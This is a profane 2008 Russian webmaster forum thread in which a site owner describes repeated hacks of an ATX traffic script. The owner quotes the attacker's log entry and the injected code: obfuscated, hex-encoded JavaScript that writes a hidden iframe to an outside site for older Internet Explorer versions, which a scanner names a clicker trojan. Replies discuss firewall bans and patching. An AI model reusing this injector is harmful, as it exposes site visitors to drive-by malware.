What the fuck's inside of you?
С нами с 01.04.04
Сообщения: 2332
Рейтинг: 1729
|
Добавлено: 05/06/08 в 19:26 |
Опять седня поломали долбаный атх, и опять вот это падло 92.62.101.9 , слух ты баран прекрати блять морочить голову людям или тебе по албански написать?
Прокляну суку навечно
АТХ сакс,уже ухожу,Смарт кстати тоже сакс
пысы:писалось в надежде , что эта блять таки прочитает
|
|
|
|
С нами с 21.12.06
Сообщения: 571
Рейтинг: 463
|
Добавлено: 06/06/08 в 00:15 |
кстати у тебя форма открыта была или как?
|
|
|
|
What the fuck's inside of you?
С нами с 01.04.04
Сообщения: 2332
Рейтинг: 1729
|
Добавлено: 06/06/08 в 01:20 |
нет конечно, причем уже очень давно, плюс была установлена защита рекомендованная на этом форуме
|
|
|
|
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
Добавлено: 06/06/08 в 09:31 |
А все ли варианты защиты были применены?
Как подломали? Снова на морде js код?
Раскрой ситуацию поподробнее?
P.S. Вот не надоело вам на этом дерьме сижи водить...
|
|
|
|
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
Добавлено: 06/06/08 в 10:39 |
версия самая последняя стояла?
|
|
|
|
What the fuck's inside of you?
С нами с 01.04.04
Сообщения: 2332
Рейтинг: 1729
|
Добавлено: 06/06/08 в 11:37 |
да, версия последняя, ломали вот так: из отчета хостера(он же и чистил и устанавливал все защиты рекомендованные в том топике)
ломали такими запросами
92.62.101.9 - - [05/Jun/2008:14:40:02 +0000] "POST /galls/rough579/images/images.php HTTP/1.0" 200 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
в файлах был ява скрипт
<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E646675636B696E672D617369616E732E636F6
D2F696D616765732F7A2F7374617469632E7068703F7369673D333233323331323833413346334532303232323632433338323132322220
6865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=
''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.appVersio
n; if (v.indexOf('MSIE 6.0') != -1){document.write(unescape(o));}if (v.indexOf('MSIE 5.') != -1){document.write
(unescape(o));}</script>
ну вставленый скрипт уже не нов, третий раз такое происходит
Project: Варианты все были, надоело, ищу ,,
|
|
|
|
programmer
С нами с 08.12.02
Сообщения: 7614
Рейтинг: 5760
|
Добавлено: 06/06/08 в 11:49 |
таким уродам надо пальцы ломать
|
|
|
|
С нами с 02.09.06
Сообщения: 598
Рейтинг: 613
|
Добавлено: 06/06/08 в 12:19 |
Файрволом надо банить эту айпишку. Атл как был дырявым, так и остался. (
|
|
|
|
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
Добавлено: 06/06/08 в 12:36 |
|
|
|
|
What the fuck's inside of you?
С нами с 01.04.04
Сообщения: 2332
Рейтинг: 1729
|
Добавлено: 06/06/08 в 13:02 |
так он еще падло кинул в папку с галерами трояна, спасибо Назапаму
The requested URL is infected with Trojan-Clicker.HTML.IFrame.lz virus
Project: согласен, чем латать дыры, лучше свалить
|
|
|
|
What the fuck's inside of you?
С нами с 01.04.04
Сообщения: 2332
Рейтинг: 1729
|
Добавлено: 06/06/08 в 13:37 |
Вроде все почистили и залатали,спасибо суппорту Адванседов !
|
|
|
|
С нами с 02.09.06
Сообщения: 598
Рейтинг: 613
|
Добавлено: 06/06/08 в 15:13 |
Бан файрволом нормально помогает, за все время атаки были только с трех айпишек.
|
|
|
|
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
Добавлено: 06/06/08 в 15:18 |
Ну значит скоро будет 4-й ип, потом 5-й.
Сидеть и ждать взлома чтобы побанить новый ип?
Имхо - странный выход из положения...
|
|
|
|
С нами с 21.09.03
Сообщения: 7329
Рейтинг: 2144
|
Добавлено: 06/06/08 в 17:36 |
Crow писал: | Опять седня поломали долбаный атх, и опять вот это падло 92.62.101.9 |
Почему при первой же проблеме этот IP не улетел автоматически в firewall?
|
|
|
|
Runka Snorkarka
С нами с 26.05.06
Сообщения: 1751
Рейтинг: 1278
|
Добавлено: 06/06/08 в 17:47 |
Project писал: | Ну значит скоро будет 4-й ип, потом 5-й.
Сидеть и ждать взлома чтобы побанить новый ип?
Имхо - странный выход из положения... |
+1 не выход не разу. Знать что есть дырки и спокойно ничего не делать.
|
|
|
|
What the fuck's inside of you?
С нами с 01.04.04
Сообщения: 2332
Рейтинг: 1729
|
Добавлено: 06/06/08 в 19:20 |
lega_cobra писал: | Почему при первой же проблеме этот IP не улетел автоматически в firewall? |
Не к тем людям обратился в самом начале, вроде все сделали почистили(после первого взлома), а потом оказалось что не все (когда уже ломанули во второй раз), все было прописано в хтаксесе, но как видим не помогает только это, сейчас уже зафаерволили, но как правильно сказали, до след Ипа.
ну и собственно вопрос, чтобы не создавать новую тему: хренодеровский скрипт, ваши впечатления, как альтернатива атх
|
|
|
|
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
Добавлено: 07/06/08 в 09:00 |
Хренодер - офигенный скрипт. Впечатления только положительные!
Навороченный правда слишком, но если рубишь в тонких настройках - то этот скрипт для тебя.
|
|
|
|
What the fuck's inside of you?
С нами с 01.04.04
Сообщения: 2332
Рейтинг: 1729
|
Добавлено: 07/06/08 в 11:26 |
лады закроем тему ,читеры все таки, продолжить можно здесь XrenCJ
|
|
|
|
awmstats crew
С нами с 27.02.03
Сообщения: 2559
Рейтинг: 1182
|
Добавлено: 07/06/08 в 14:09 |
а что стоит помимо атх ?
|
|
|
|
What the fuck's inside of you?
С нами с 01.04.04
Сообщения: 2332
Рейтинг: 1729
|
Добавлено: 07/06/08 в 16:38 |
везде атл и атх, ввиду массовости и простоты настроек, но ломают почему то именно одно гей мгп, то ли этот долбохакер в попу любит фью фью то ли хз
|
|
|
|